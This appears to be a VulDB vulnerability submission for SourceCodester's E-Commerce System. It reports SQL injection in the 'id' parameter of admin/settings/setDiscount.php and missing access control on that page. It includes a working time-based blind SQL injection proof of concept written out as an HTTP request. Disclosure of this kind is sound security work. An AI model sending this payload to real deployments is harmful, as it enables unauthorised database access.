| タイトル | E-Commerce System setDiscount.php SQL Injection Vulnerability |
|---|
| 説明 | E-Commerce System has a SQL Injection Vulnerability , the vulnerable URI is '/ecommerce/admin/settings/setDiscount.php?id=201737' , and the injectable parameters is id
A time-based blind poc is below:
GET /ecommerce/admin/settings/setDiscount.php?id=201737 AND (SELECT 8973 FROM (SELECT(SLEEP(5)))OoAD) HTTP/1.1
And server will also response even if there's no cookie in the header, which is an improper access control. |
|---|
| ソース | ⚠️ https://www.sourcecodester.com/php/13524/e-commerce-system-using-phpmysqli.html |
|---|
| ユーザー | WWesleywww (UID 43117) |
|---|
| 送信 | 2023年03月20日 08:07 (3 年 ago) |
|---|
| モデレーション | 2023年03月20日 08:33 (26 minutes later) |
|---|
| ステータス | 承諾済み |
|---|
| VulDBエントリ | 223409 [SourceCodester E-Commerce System 1.0 setDiscount.php 識別子 SQLインジェクション] |
|---|
| ポイント | 20 |
|---|